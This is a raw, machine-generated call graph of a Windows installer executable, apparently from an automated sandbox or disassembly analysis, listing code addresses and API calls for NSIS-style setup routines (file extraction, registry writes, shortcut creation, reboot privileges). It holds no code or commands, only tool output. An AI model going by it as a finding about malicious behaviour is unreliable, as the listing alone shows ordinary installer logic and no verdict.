403f7b 8 API calls 3662->3666 3663 405d51 18 API calls 3668 40446e SHBrowseForFolderA 3663->3668 3664 40450e 3669 40588f 18 API calls 3664->3669 3670 4043df 3665->3670 3671 40469c 3666->3671 3672 4043b9 3667->3672 3673 404486 CoTaskMemFree 3668->3673 3674 4044de 3668->3674 3675 404514 3669->3675 3676 403f14 19 API calls 3670->3676 3672->3661 3679 4057a1 3 API calls 3672->3679 3677 4057a1 3 API calls 3673->3677 3674->3662 3715 405509 GetDlgItemTextA 3674->3715 3716 405d2f lstrcpynA 3675->3716 3678 4043ed 3676->3678 3680 404493 3677->3680 3714 403f49 SendMessageA 3678->3714 3679->3661 3683 4044ca SetDlgItemTextA 3680->3683 3688 405d51 18 API calls 3680->3688 3683->3674 3684 4043f3 3686 4060c8 5 API calls 3684->3686 3685 40452b 3687 4060c8 5 API calls 3685->3687 3686->3689 3696 404532 3687->3696 3690 4044b2 lstrcmpiA 3688->3690 3689->3662 3689->3663 3689->3674 3690->3683 3693 4044c3 lstrcatA 3690->3693 3691 40456e 3717 405d2f lstrcpynA 3691->3717 3693->3683 3694 404575 3695 40583a 4 API calls 3694->3695 3697 40457b GetDiskFreeSpaceA 3695->3697 3696->3691 3699 4057e8 2 API calls 3696->3699 3701 4045c6 3696->3701 3700 40459f MulDiv 3697->3700 3697->3701 3699->3696 3700->3701 3702 404637 3701->3702 3703 4047ce 21 API calls 3701->3703 3704 40465a 3702->3704 3706 40140b 2 API calls 3702->3706 3705 404624 3703->3705 3718 403f36 EnableWindow 3704->3718 3708 404639 SetDlgItemTextA 3705->3708 3709 404629 3705->3709 3706->3704 3708->3702 3711 404709 21 API calls 3709->3711 3710 404676 3710->3662 3719 4042e7 3710->3719 3711->3702 3713->3657 3714->3684 3715->3664 3716->3685 3717->3694 3718->3710 3720 4042f5 3719->3720 3721 4042fa SendMessageA 3719->3721 3720->3721 3721->3662 3722 4019d2 3723 402a3a 18 API calls 3722->3723 3724 4019d9 3723->3724 3725 402a3a 18 API calls 3724->3725 3726 4019e2 3725->3726 3727 4019e9 lstrcmpiA 3726->3727 3728 4019fb lstrcmpA 3726->3728 3729 4019ef 3727->3729 3728->3729 3730 4021d2 3731 402a3a 18 API calls 3730->3731 3732 4021d8 3731->3732 3733 402a3a 18 API calls 3732->3733 3734 4021e1 3733->3734 3735 402a3a 18 API calls 3734->3735 3736 4021ea 3735->3736 3737 406033 2 API calls 3736->3737 3738 4021f3 3737->3738 3739 402204 lstrlenA lstrlenA 3738->3739 3740 4021f7 3738->3740 3742 404f48 25 API calls 3739->3742 3741 404f48 25 API calls 3740->3741 3744 4021ff 3740->3744 3741->3744 3743 402240 SHFileOperationA 3742->3743 3743->3740 3743->3744 3745 4014d6 3746 402a1d 18 API calls 3745->3746 3747 4014dc Sleep 3746->3747 3749 4028cf 3747->3749 3750 40155b 3751 401577 ShowWindow 3750->3751 3752 40157e 3750->3752 3751->3752 3753 40158c ShowWindow 3752->3753 3754 4028cf 3752->3754 3753->3754 3755 40255c 3756 402a1d 18 API calls 3755->3756 3758 402566 3756->3758 3757 4025d0 3758->3757 3759 405a1a ReadFile 3758->3759 3760 4025d2 3758->3760 3763 4025e2 3758->3763 3759->3758 3764 405c8d wsprintfA 3760->3764 3762 4025f8 SetFilePointer 3762->3757 3763->3757 3763->3762 3764->3757 3765 40405d 3766 404073 3765->3766 3773 40417f 3765->3773 3770 403f14 19 API calls 3766->3770 3767 4041ee 3768 4042c2 3767->3768 3769 4041f8 GetDlgItem 3767->3769 3775 403f7b 8 API calls 3768->3775 3771 404280 3769->3771 3772 40420e 3769->3772 3774 4040c9 3770->3774 3771->3768 3780 404292 3771->3780 3772->3771 3779 404234 6 API calls 3772->3779 3773->3767 3773->3768 3777 4041c3 GetDlgItem SendMessageA 3773->3777 3776 403f14 19 API calls 3774->3776 3787 4042bd 3775->3787 3778 4040d6 CheckDlgButton 3776->3778 3796 403f36 EnableWindow 3777->3796 3794 403f36 EnableWindow 3778->3794 3779->3771 3783 404298 SendMessageA 3780->3783 3784 4042a9 3780->3784 3783->3784 3784->3787 3788 4042af SendMessageA 3784->3788 3785 4041e9 3789 4042e7 SendMessageA 3785->3789 3786 4040f4 GetDlgItem 3795 403f49 SendMessageA 3786->3795 3788->3787 3789->3767 3791 40410a SendMessageA 3792 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3791->3792 3793 404128 GetSysColor 3791->3793 3792->3787 3793->3792 3794->3786 3795->3791 3796->3785 3797 40205e 3798 402a3a 18 API calls 3797->3798 3799 402065 3798->3799 3800 402a3a 18 API calls 3799->3800 3801 40206f 3800->3801 3802 402a3a 18 API calls 3801->3802 3803 402079 3802->3803 3804 402a3a 18 API calls 3803->3804 3805 402083 3804->3805 3806 402a3a 18 API calls 3805->3806 3807 40208d 3806->3807 3808 4020cc CoCreateInstance 3807->3808 3809 402a3a 18 API calls 3807->3809 3812 4020eb 3808->3812 3814 402193 3808->3814 3809->3808 3810 401423 25 API calls 3811 4021c9 3810->3811 3813 402173 MultiByteToWideChar 3812->3813 3812->3814 3813->3814 3814->3810 3814->3811 3815 40265e 3816 402664 3815->3816 3817 402668 FindNextFileA 3816->3817 3818 40267a 3816->3818 3817->3818 3819 4026b9 3817->3819 3821 405d2f lstrcpynA 3819->3821 3821->3818 3822 401cde GetDlgItem GetClientRect 3823 402a3a 18 API calls 3822->3823 3824 401d0e LoadImageA SendMessageA 3823->3824 3825 401d2c DeleteObject 3824->3825 3826 4028cf 3824->3826 3825->3826 3827 401662 3828 402a3a 18 API calls 3827->3828 3829 401669 3828->3829 3830 402a3a 18 API calls 3829->3830 3831 401672 3830->3831 3832 402a3a 18 API calls 3831->3832 3833 40167b MoveFileA 3832->3833 3834 401687 3833->3834 3835 40168e 3833->3835 3836 401423 25 API calls 3834->3836 3837 406033 2 API calls 3835->3837 3839 4021c9 3835->3839 3836->3839 3838 40169d 3837->3838 3838->3839 3840 405bea 38 API calls 3838->3840 3840->3834 2881 402364 2882 40236a 2881->2882 2883 402a3a 18 API calls 2882->2883 2884 40237c 2883->2884 2885 402a3a 18 API calls 2884->2885 2886 402386 RegCreateKeyExA 2885->2886 2887 4023b0 2886->2887 2888 4028cf 2886->2888 2889 4023c8 2887->2889 2890 402a3a 18 API calls 2887->2890 2891 4023d4 2889->2891 2898 402a1d 2889->2898 2893 4023c1 lstrlenA 2890->2893 2892 4023ef RegSetValueExA 2891->2892 2901 402e9f 2891->2901 2896 402405 RegCloseKey 2892->2896 2893->2889 2896->2888 2899 405d51 18 API calls 2898->2899 2900 402a31 2899->2900 2900->2891 2902 402eb5 2901->2902 2903 402ee3 2902->2903 2926 4030c7 SetFilePointer 2902->2926 2921 4030b1 2903->2921 2907 402f00 GetTickCount 2910 403034 2907->2910 2917 402f4f 2907->2917 2908 40304a 2909 40308c 2908->2909 2914 40304e 2908->2914 2912 4030b1 ReadFile 2909->2912 2910->2892 2911 4030b1 ReadFile 2911->2917 2912->2910 2913 4030b1 ReadFile 2913->2914 2914->2910 2914->2913 2915 405a49 WriteFile 2914->2915 2915->2914 2916 402fa5 GetTickCount 2916->2917 2917->2910 2917->2911 2917->2916 2918 402fca MulDiv wsprintfA 2917->2918 2924 405a49 WriteFile 2917->2924 2919 404f48 25 API calls 2918->2919 2919->2917 2927 405a1a ReadFile 2921->2927 2925 405a67 2924->2925 2925->2917 2926->2903 2928 402eee 2927->2928 2928->2907 2928->2908 2928->2910 3841 401dea 3842 402a3a 18 API calls 3841->3842 3843 401df0 3842->3843 3844 402a3a 18 API calls 3843->3844 3845 401df9 3844->3845 3846 402a3a 18 API calls 3845->3846 3847 401e02 3846->3847 3848 402a3a 18 API calls 3847->3848 3849 401e0b 3848->3849 3850 401423 25 API calls 3849->3850 3851 401e12 ShellExecuteA 3850->3851 3852 401e3f 3851->3852 3853 40366d 3854 403678 3853->3854 3855 40367c 3854->3855 3856 40367f GlobalAlloc 3854->3856 3856->3855 3857 401eee 3858 402a3a 18 API calls 3857->3858 3859 401ef5 3858->3859 3860 4060c8 5 API calls 3859->3860 3861 401f04 3860->3861 3862 401f1c GlobalAlloc 3861->3862 3863 401f84 3861->3863 3862->3863 3864 401f30 3862->3864 3865 4060c8 5 API calls 3864->3865 3866 401f37 3865->3866 3867 4060c8 5 API calls 3866->3867 3868 401f41 3867->3868 3868->3863 3872 405c8d wsprintfA 3868->3872 3870 401f78 3873 405c8d wsprintfA 3870->3873 3872->3870 3873->3863 3874 4014f0 SetForegroundWindow 3875 4028cf 3874->3875 3881 4018f5 3882 40192c 3881->3882 3883 402a3a 18 API calls 3882->3883 3884 401931 3883->3884 3885 4055d1 69 API calls 3884->3885 3886 40193a 3885->3886 3887 4024f7 3888 402a3a 18 API calls 3887->3888 3889 4024fe 3888->3889 3892 4059a2 GetFileAttributesA CreateFileA 3889->3892 3891 40250a 3892->3891 3893 4018f8 3894 402a3a 18 API calls 3893->3894 3895 4018ff 3894->3895 3896 405525 MessageBoxIndirectA 3895->3896 3897 401908 3896->3897 3898 4014fe 3899 401506 3898->3899 3901 401519 3898->3901 3900 402a1d 18 API calls 3899->3900 3900->3901 3902 402b7f 3903 402ba7 3902->3903 3904 402b8e SetTimer 3902->3904 3905 402bfc 3903->3905 3906 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3903->3906 3904->3903 3906->3905 3907 401000 3908 401037 BeginPaint GetClientRect 3907->3908 3909 40100c DefWindowProcA 3907->3909 3911 4010f3 3908->3911 3914 401179 3909->3914 3912 401073 CreateBrushIndirect FillRect DeleteObject 3911->3912 3913 4010fc 3911->3913 3912->3911 3915 401102 CreateFontIndirectA 3913->3915 3916 401167 EndPaint 3913->3916 3915->3916 3917 401112 6 API calls 3915->3917 3916->3914 3917->3916 3918 401b02 3919 402a3a 18 API calls 3918->3919 3920 401b09 3919->3920 3921 402a1d 18 API calls 3920->3921 3922 401b12 wsprintfA 3921->3922 3923 4028cf 3922->3923 3924 402482 3925 402b44 19 API calls 3924->3925 3926 40248c 3925->3926 3927 402a1d 18 API calls 3926->3927 3928 402495 3927->3928 3929 4024b8 RegEnumValueA 3928->3929 3930 4024ac RegEnumKeyA 3928->3930 3931 4026a6 3928->3931 3929->3931 3932 4024d1 RegCloseKey 3929->3932 3930->3932 3932->3931 3934 401a03 3935 402a3a 18 API calls 3934->3935 3936 401a0c ExpandEnvironmentStringsA 3935->3936 3937 401a20 3936->3937 3939 401a33 3936->3939 3938 401a25 lstrcmpA 3937->3938 3937->3939 3938->3939 3940 402283 3941 402291 3940->3941 3942 40228b 3940->3942 3944 402a3a 18 API calls 3941->3944 3946 4022a1 3941->3946 3943 402a3a 18 API calls 3942->3943 3943->3941 3944->3946 3945 4022af 3948 402a3a 18 API calls 3945->3948 3946->3945 3947 402a3a 18 API calls 3946->3947 3947->3945 3949 4022b8 WritePrivateProfileStringA 3948->3949 3950 405086 3951 405231 3950->3951 3952 4050a8 GetDlgItem GetDlgItem GetDlgItem 3950->3952 3954 405261 3951->3954 3955 405239 GetDlgItem CreateThread CloseHandle 3951->3955 3995 403f49 SendMessageA 3952->3995 3956 40528f 3954->3956 3959 4052b0 3954->3959 3960 405277 ShowWindow ShowWindow 3954->3960 3955->3954 3957 4052ea 3956->3957 3961 4052c3 ShowWindow 3956->3961 3962 40529f 3956->3962 3957->3959 3972 4052f7 SendMessageA 3957->3972 3958 405118 3964 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3958->3964 3963 403f7b 8 API calls 3959->3963 3997 403f49 SendMessageA 3960->3997 3968 4052e3 3961->3968 3969 4052d5 3961->3969 3966 403eed SendMessageA 3962->3966 3967 4052bc 3963->3967 3970 405171 SendMessageA SendMessageA 3964->3970 3971 40518d 3964->3971 3966->3959 3974 403eed SendMessageA 3968->3974 3973 404f48 25 API calls 3969->3973 3970->3971 3975 4051a0 3971->3975 3976 405192 SendMessageA 3971->3976 3972->3967 3977 405310 CreatePopupMenu 3972->3977 3973->3968 3974->3957 3978 403f14 19 API calls 3975->3978 3976->3975 3979 405d51 18 API calls 3977->3979 3981 4051b0 3978->3981 3980 405320 AppendMenuA 3979->3980 3982 405351 TrackPopupMenu 3980->3982 3983 40533e GetWindowRect 3980->3983 3984 4051b9 ShowWindow 3981->3984 3985 4051ed GetDlgItem SendMessageA 3981->3985 3982->3967 3986 40536d 3982->3986 3983->3982 3987 4051dc 3984->3987 3988 4051cf ShowWindow 3984->3988 3985->3967 3989 405214 SendMessageA SendMessageA 3985->3989 3990 40538c SendMessageA 3986->3990 3996 403f49 SendMessageA 3987->3996 3988->3987 3989->3967 3990->3990 3991 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3990->3991 3993 4053cb SendMessageA 3991->3993 3993->3993 3994 4053ed GlobalUnlock SetClipboardData CloseClipboard 3993->3994 3994->3967 3995->3958 3996->3985 3997->3956 3013 402308 3014 402338 3013->3014 3015 40230d 3013->3015 3017 402a3a 18 API calls 3014->3017 3026 402b44 3015->3026 3019 40233f 3017->3019 3018 402314 3020 40231e 3018->3020 3024 402357 3018->3024 3030 402a7a RegOpenKeyExA 3019->3030 3021 402a3a 18 API calls 3020->3021 3022 402325 RegDeleteValueA RegCloseKey 3021->3022 3022->3024 3027 402a3a 18 API calls 3026->3027 3028 402b5d 3027->3028 3029 402b6b RegOpenKeyExA 3028->3029 3029->3018 3034 402aa5 3030->3034 3038 402355 3030->3038 3031 402acb RegEnumKeyA 3032 402add RegCloseKey 3031->3032 3031->3034 3040 4060c8 GetModuleHandleA 3032->3040 3033 402b02 RegCloseKey 3033->3038 3034->3031 3034->3032 3034->3033 3036 402a7a 5 API calls 3034->3036 3036->3034 3038->3024 3039 402b1d RegDeleteKeyA 3039->3038 3041 4060e4 3040->3041 3042 4060ee GetProcAddress 3040->3042 3046 40605a GetSystemDirectoryA 3041->3046 3044 402aed 3042->3044 3044->3038 3044->3039 3045 4060ea 3045->3042 3045->3044 3047 40607c wsprintfA LoadLibraryExA 3046->3047 3047->3045 3998 402688 3999 402a3a 18 API calls 3998->3999 4000 40268f FindFirstFileA 3999->4000 4001 4026b2 4000->4001 4005 4026a2 4000->4005 4002 4026b9 4001->4002 4006 405c8d wsprintfA 4001->4006 4007 405d2f lstrcpynA 4002->4007 4006->4002 4007->4005 4008 401c8a 4009 402a1d 18 API calls 4008->4009 4010 401c90 IsWindow 4009->4010 4011 4019f3 4010->4011 4012 40430b 4013 404341 4012->4013 4014 40431b 4012->4014 4016 403f7b 8 API calls 4013->4016 4015 403f14 19 API calls 4014->4015 4017 404328 SetDlgItemTextA 4015->4017 4018 40434d 4016->4018 4017->4013 3199 40310f SetErrorMode GetVersion 3200 403146 3199->3200 3201 40314c 3199->3201 3202 4060c8 5 API calls 3200->3202 3203 40605a 3 API calls 3201->3203 3202->3201 3204 403162 lstrlenA 3203->3204 3204->3201 3205 403171 3204->3205 3206 4060c8 5 API calls 3205->3206 3207 403179 3206->3207 3208 4060c8 5 API calls 3207->3208 3209 403180 #17 OleInitialize SHGetFileInfoA 3208->3209 3287 405d2f lstrcpynA 3209->3287 3211 4031bd GetCommandLineA 3288 405d2f lstrcpynA 3211->3288 3213 4031cf GetModuleHandleA 3214 4031e6 3213->3214 3215 4057cc CharNextA 3214->3215 3216 4031fa CharNextA 3215->3216 3225 40320a 3216->3225 3217 4032d4 3218 4032e7 GetTempPathA 3217->3218 3289 4030de 3218->3289 3220 4032ff 3222 403303 GetWindowsDirectoryA lstrcatA 3220->3222 3223 403359 DeleteFileA 3220->3223 3221 4057cc CharNextA 3221->3225 3226 4030de 12 API calls 3222->3226 3299 402c66 GetTickCount GetModuleFileNameA 3223->3299 3225->3217 3225->3221 3227 4032d6 3225->3227 3229 40331f 3226->3229 3383 405d2f lstrcpynA 3227->3383 3228 40336d 3236 4057cc CharNextA 3228->3236 3269 4033f3 3228->3269 3282 403403 3228->3282 3229->3223 3231 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3229->3231 3233 4030de 12 API calls 3231->3233 3234 403351 3233->3234 3234->3223 3234->3282 3240 403388 3236->3240 3238 40353b 3242 403543 GetCurrentProcess OpenProcessToken 3238->3242 3243 4035bd ExitProcess 3238->3243 3239 40341d 3393 405525 3239->3393 3247 403433 3240->3247 3248 4033ce 3240->3248 3244 40358e 3242->3244 3245 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3242->3245 3250 4060c8 5 API calls 3244->3250 3245->3244 3397 4054a8 3247->3397 3251 40588f 18 API calls 3248->3251 3253 403595 3250->3253 3254 4033d9 3251->3254 3258 4035aa ExitWindowsEx 3253->3258 3261 4035b6 3253->3261 3254->3282 3384 405d2f lstrcpynA 3254->3384 3256 403454 lstrcatA lstrcmpiA 3260 403470 3256->3260 3256->3282 3257 403449 lstrcatA 3257->3256 3258->3243 3258->3261 3263 403475 3260->3263 3264 40347c 3260->3264 3265 40140b 2 API calls 3261->3265 3262 4033e8 3385 405d2f lstrcpynA 3262->3385 3400 40540e CreateDirectoryA 3263->3400 3405 40548b CreateDirectoryA 3264->3405 3265->3243 3327 4036af 3269->3327 3271 403481 SetCurrentDirectoryA 3272 403490 3271->3272 3273 40349b 3271->3273 3408 405d2f lstrcpynA 3272->3408 3409 405d2f lstrcpynA 3273->3409 3276 405d51 18 API calls 3277 4034da DeleteFileA 3276->3277 3278 4034e7 CopyFileA 3277->3278 3284 4034a9 3277->3284 3278->3284 3279 40352f 3281 405bea 38 API calls 3279->3281 3280 405bea 38 API calls 3280->3284 3281->3282 3386 4035d5 3282->3386 3283 405d51 18 API calls 3283->3284 3284->3276 3284->3279 3284->3280 3284->3283 3285 4054c0 2 API calls 3284->3285 3286 40351b CloseHandle 3284->3286 3285->3284 3286->3284 3287->3211 3288->3213 3290 405f9a 5 API calls 3289->3290 3291 4030ea 3290->3291 3292 4030f4 3291->3292 3293 4057a1 3 API calls 3291->3293 3292->3220 3294 4030fc 3293->3294 3295 40548b 2 API calls 3294->3295 3296 403102 3295->3296 3410 4059d1 3296->3410 3414 4059a2 GetFileAttributesA CreateFileA 3299->3414 3301 402ca6 3319 402cb6 3301->3319 3415 405d2f lstrcpynA 3301->3415 3303 402ccc 3304 4057e8 2 API calls 3303->3304 3305 402cd2 3304->3305 3416 405d2f lstrcpynA 3305->3416 3307 402cdd GetFileSize 3308 402dd9 3307->3308 3321 402cf4 3307->3321 3417 402c02 3308->3417 3310 402de2 3312 402e12 GlobalAlloc 3310->3312 3310->3319 3429 4030c7 SetFilePointer 3310->3429 3311 4030b1 ReadFile 3311->3321 3428 4030c7 SetFilePointer 3312->3428 3314 402e45 3318 402c02 6 API calls 3314->3318 3316 402dfb 3320 4030b1 ReadFile 3316->3320 3317 402e2d 3322 402e9f 32 API calls 3317->3322 3318->3319 3319->3228 3323 402e06 3320->3323 3321->3308 3321->3311 3321->3314 3321->3319 3324 402c02 6 API calls 3321->3324 3325 402e39 3322->3325 3323->3312 3323->3319 3324->3321 3325->3319 3325->3325 3326 402e76 SetFilePointer 3325->3326 3326->3319 3328 4060c8 5 API calls 3327->3328 3329 4036c3 3328->3329 3330 4036c9 3329->3330 3331 4036db 3329->3331 3439 405c8d wsprintfA 3330->3439 3332 405c16 3 API calls 3331->3332 3333 403706 3332->3333 3334 403724 lstrcatA 3333->3334 3336 405c16 3 API calls 3333->3336 3337 4036d9 3334->3337 3336->3334 3430 403974 3337->3430 3340 40588f 18 API calls 3341 403756 3340->3341 3342 4037df 3341->3342 3344 405c16 3 API calls 3341->3344 3343 40588f 18 API calls 3342->3343 3345 4037e5 3343->3345 3346 403782 3344->3346 3347 4037f5 LoadImageA 3345->3347 3348 405d51 18 API calls 3345->3348 3346->3342 3354 40379e lstrlenA 3346->3354 3355 4057cc CharNextA 3346->3355 3349 40389b 3347->3349 3350 40381c RegisterClassA 3347->3350 3348->3347 3353 40140b 2 API calls 3349->3353 3351 403852 SystemParametersInfoA CreateWindowExA 3350->3351 3352 4038a5 3350->3352 3351->3349 3352->3282 3358 4038a1 3353->3358 3356 4037d2 3354->3356 3357 4037ac lstrcmpiA 3354->3357 3359 40379c 3355->3359 3361 4057a1 3 API calls 3356->3361 3357->3356 3360 4037bc GetFileAttributesA 3357->3360 3358->3352 3363 403974 19 API calls 3358->3363 3359->3354 3362 4037c8 3360->3362 3364 4037d8 3361->3364 3362->3356 3365 4057e8 2 API calls 3362->3365 3366 4038b2 3363->3366 3440 405d2f lstrcpynA 3364->3440 3365->3356 3368 403941 3366->3368 3369 4038be ShowWindow 3366->3369 3441 40501a OleInitialize 3368->3441 3371 40605a 3 API calls 3369->3371 3373 4038d6 3371->3373 3372 403947 3374 403963 3372->3374 3375 40394b 3372->3375 3376 4038e4 GetClassInfoA 3373->3376 3380 40605a 3 API calls 3373->3380 3379 40140b 2 API calls 3374->3379 3375->3352 3382 40140b 2 API calls 3375->3382 3377 4038f8 GetClassInfoA RegisterClassA 3376->3377 3378 40390e DialogBoxParamA 3376->3378 3377->3378 3381 40140b 2 API calls 3378->3381 3379->3352 3380->3376 3381->3352 3382->3352 3383->3218 3384->3262 3385->3269 3387 4035ed 3386->3387 3388 4035df CloseHandle 3386->3388 3449 40361a 3387->3449 3388->3387 3391 4055d1 69 API calls 3392 40340c OleUninitialize 3391->3392 3392->3238 3392->3239 3394 40553a 3393->3394 3395 40342b ExitProcess 3394->3395 3396 40554e MessageBoxIndirectA 3394->3396 3396->3395 3398 4060c8 5 API calls 3397->3398 3399 403438 lstrcatA 3398->3399 3399->3256 3399->3257 3401 40545f GetLastError 3400->3401 3402 40347a 3400->3402 3401->3402 3403 40546e SetFileSecurityA 3401->3403 3402->3271 3403->3402 3404 405484 GetLastError 3403->3404 3404->3402 3406 40549b 3405->3406 3407 40549f GetLastError 3405->3407 3406->3271 3407->3406 3408->3273 3409->3284 3411 4059dc GetTickCount GetTempFileNameA 3410->3411 3412 40310d 3411->3412 3413 405a09 3411->3413 3412->3220 3413->3411 3413->3412 3414->3301 3415->3303 3416->3307 3418 402c23 3417->3418 3419 402c0b 3417->3419 3422 402c33 GetTickCount 3418->3422 3423 402c2b 3418->3423 3420 402c14 DestroyWindow 3419->3420 3421 402c1b 3419->3421 3420->3421 3421->3310 3425 402c41 CreateDialogParamA ShowWindow 3422->3425 3426 402c64 3422->3426 3424 406104 2 API calls 3423->3424 3427 402c31 3424->3427 3425->3426 3426->3310 3427->3310 3428->3317 3429->3316 3431 403988 3430->3431 3448 405c8d wsprintfA 3431->3448 3433 4039f9 3434 405d51 18 API calls 3433->3434 3435 403a05 SetWindowTextA 3434->3435 3436 403a21 3435->3436 3437 403734 3435->3437 3436->3437 3438 405d51 18 API calls 3436->3438 3437->3340 3438->3436 3439->3337 3440->3342 3442 403f60 SendMessageA 3441->3442 3446 40503d 3442->3446 3443 405064 3444 403f60 SendMessageA 3443->3444 3445 405076 OleUninitialize 3444->3445 3445->3372 3446->3443 3447 401389 2 API calls 3446->3447 3447->3446 3448->3433 3450 403628 3449->3450 3451 40362d FreeLibrary GlobalFree 3450->3451 3452 4035f2 3450->3452 3451->3451 3451->3452 3452->3391 3453 402410 3454 402b44 19 API calls 3453->3454 3455 40241a 3454->3455 3456 402a3a 18 API calls 3455->3456 3457 402423 3456->3457 3458 40242d RegQueryValueExA 3457->3458 3462 4026a6 3457->3462 3459 402453 RegCloseKey 3458->3459 3460 40244d 3458->3460 3459->3462 3460->3459 3464 405c8d wsprintfA 3460->3464 3464->3459 3465 401f90 3466 401fa2 3465->3466 3475 402050 3465->3475 3467 402a3a 18 API calls 3466->3467 3468 401fa9 3467->3468 3470 402a3a 18 API calls 3468->3470 3469 401423 25 API calls 3476 4021c9 3469->3476 3471 401fb2 3470->3471 3472 401fc7 LoadLibraryExA 3471->3472 3473 401fba GetModuleHandleA 3471->3473 3474 401fd7 GetProcAddress 3472->3474 3472->3475 3473->3472 3473->3474 3477 402023 3474->3477 3478 401fe6 3474->3478 3475->3469 3479 404f48 25 API calls 3477->3479 3481 401ff6 3478->3481 3483 401423 3478->3483 3479->3481 3481->3476 3482 402044 FreeLibrary 3481->3482 3482->3476 3484 404f48 25 API calls 3483->3484 3485 401431 3484->3485 3485->3481 4019 401490 4020 404f48 25 API calls 4019->4020 4021 401497 4020->4021 3547 401595 3548 402a3a 18 API calls 3547->3548 3549 40159c SetFileAttributesA 3548->3549 3550 4015ae 3549->3550 4022 402616 4023 40261d 4022->4023 4024 40287c 4022->4024 4025 402a1d 18 API calls 4023->4025 4026 402628 4025->4026 4027 40262f SetFilePointer 4026->4027 4027->4024 4028 40263f 4027->4028 4030 405c8d wsprintfA 4028->4030 4030->4024 4031 401717 4032 402a3a 18 API calls 4031->4032 4033 40171e SearchPathA 4032->4033 4034 401739 4033->4034 4035 402519 4036 40252e 4035->4036 4037 40251e 4035->4037 4038 402a3a 18 API calls 4036->4038 4039 402a1d 18 API calls 4037->4039 4040 402535 lstrlenA 4038->4040 4041 402527 4039->4041 4040->4041 4042 402557 4041->4042 4043 405a49 WriteFile 4041->4043 4043->4042 4044 40149d 4045 4014ab PostQuitMessage 4044->4045 4046 40226e 4044->4046 4045->4046 4047 4046a3 4048 4046b3 4047->4048 4049 4046cf 4047->4049 4058 405509 GetDlgItemTextA 4048->4058 4051 404702 4049->4051 4052 4046d5 SHGetPathFromIDListA 4049->4052 4054 4046e5 4052->4054 4057 4046ec SendMessageA 4052->4057 4053 4046c0 SendMessageA 4053->4049 4055 40140b 2 API calls 4054->4055 4055->4057 4057->4051 4058->4053 4059 401ca7 4060 402a1d 18 API calls 4059->4060 4061 401cae 4060->4061 4062 402a1d 18 API calls 4061->4062 4063 401cb6 GetDlgItem 4062->4063 4064 402513 4063->4064 4065 404028 lstrcpynA lstrlenA 3071 40192a 3072 40192c 3071->3072 3073 402a3a 18 API calls 3072->3073 3074 401931 3073->3074 3077 4055d1 3074->3077 3117 40588f 3077->3117 3080 405610 3083 405748 3080->3083 3131 405d2f lstrcpynA 3080->3131 3081 4055f9 DeleteFileA 3082 40193a 3081->3082 3083->3082 3149 406033 FindFirstFileA 3083->3149 3085 405636 3086 405649 3085->3086 3087 40563c lstrcatA 3085->3087 3132 4057e8 lstrlenA 3086->3132 3089 40564f 3087->3089 3091 40565d lstrcatA 3089->3091 3093 405668 lstrlenA FindFirstFileA 3089->3093 3091->3093 3095 40573e 3093->3095 3115 40568c 3093->3115 3094 405766 3152 4057a1 lstrlenA CharPrevA 3094->3152 3095->3083 3097 4057cc CharNextA 3097->3115 3099 405589 5 API calls 3100 405778 3099->3100 3101 405792 3100->3101 3102 40577c 3100->3102 3103 404f48 25 API calls 3101->3103 3102->3082 3107 404f48 25 API calls 3102->3107 3103->3082 3104 40571d FindNextFileA 3106 405735 FindClose 3104->3106 3104->3115 3106->3095 3108 405789 3107->3108 3109 405bea 38 API calls 3108->3109 3112 405790 3109->3112 3111 4055d1 62 API calls 3111->3115 3112->3082 3113 404f48 25 API calls 3113->3104 3114 404f48 25 API calls 3114->3115 3115->3097 3115->3104 3115->3111 3115->3113 3115->3114 3136 405d2f lstrcpynA 3115->3136 3137 405589 3115->3137 3145 405bea MoveFileExA 3115->3145 3155 405d2f lstrcpynA 3117->3155 3119 4058a0 3156 40583a CharNextA CharNextA 3119->3156 3122 4055f1 3122->3080 3122->3081 3123 405f9a 5 API calls 3129 4058b6 3123->3129 3124 4058e1 lstrlenA 3125 4058ec 3124->3125 3124->3129 3127 4057a1 3 API calls 3125->3127 3126 406033 2 API calls 3126->3129 3128 4058f1 GetFileAttributesA 3127->3128 3128->3122 3129->3122 3129->3124 3129->3126 3130 4057e8 2 API calls 3129->3130 3130->3124 3131->3085 3133 4057f5 3132->3133 3134 405806 3133->3134 3135 4057fa CharPrevA 3133->3135 3134->3089 3135->3133 3135->3134 3136->3115 3162 40597d GetFileAttributesA 3137->3162 3140 4055a4 RemoveDirectoryA 3143 4055b2 3140->3143 3141 4055ac DeleteFileA 3141->3143 3142 4055b6 3142->3115 3143->3142 3144 4055c2 SetFileAttributesA 3143->3144 3144->3142 3146 405c0b 3145->3146 3147 405bfe 3145->3147 3146->3115 3165 405a78 lstrcpyA 3147->3165 3150 405762 3149->3150 3151 406049 FindClose 3149->3151 3150->3082 3150->3094 3151->3150 3153 40576c 3152->3153 3154 4057bb lstrcatA 3152->3154 3153->3099 3154->3153 3155->3119 3157 405855 3156->3157 3160 405865 3156->3160 3158 405860 CharNextA 3157->3158 3157->3160 3161 405885 3158->3161 3159 4057cc CharNextA 3159->3160 3160->3159 3160->3161 3161->3122 3161->3123 3163 405595 3162->3163 3164 40598f SetFileAttributesA 3162->3164 3163->3140 3163->3141 3163->3142 3164->3163 3166 405aa0 3165->3166 3167 405ac6 GetShortPathNameA 3165->3167 3192 4059a2 GetFileAttributesA CreateFileA 3166->3192 3168 405be5 3167->3168 3169 405adb 3167->3169 3168->3146 3169->3168 3171 405ae3 wsprintfA 3169->3171 3173 405d51 18 API calls 3171->3173 3172 405aaa CloseHandle GetShortPathNameA 3172->3168 3174 405abe 3172->3174 3175 405b0b 3173->3175 3174->3167 3174->3168 3193 4059a2 GetFileAttributesA CreateFileA 3175->3193 3177 405b18 3177->3168 3178 405b27 GetFileSize GlobalAlloc 3177->3178 3179 405b49 3178->3179 3180 405bde CloseHandle 3178->3180 3181 405a1a ReadFile 3179->3181 3180->3168 3182 405b51 3181->3182 3182->3180 3194 405907 lstrlenA 3182->3194 3185 405b68 lstrcpyA 3188 405b8a 3185->3188 3186 405b7c 3187 405907 4 API calls 3186->3187 3187->3188 3189 405bc1 SetFilePointer 3188->3189 3190 405a49 WriteFile 3189->3190 3191 405bd7 GlobalFree 3190->3191 3191->3180 3192->3172 3193->3177 3195 405948 lstrlenA 3194->3195 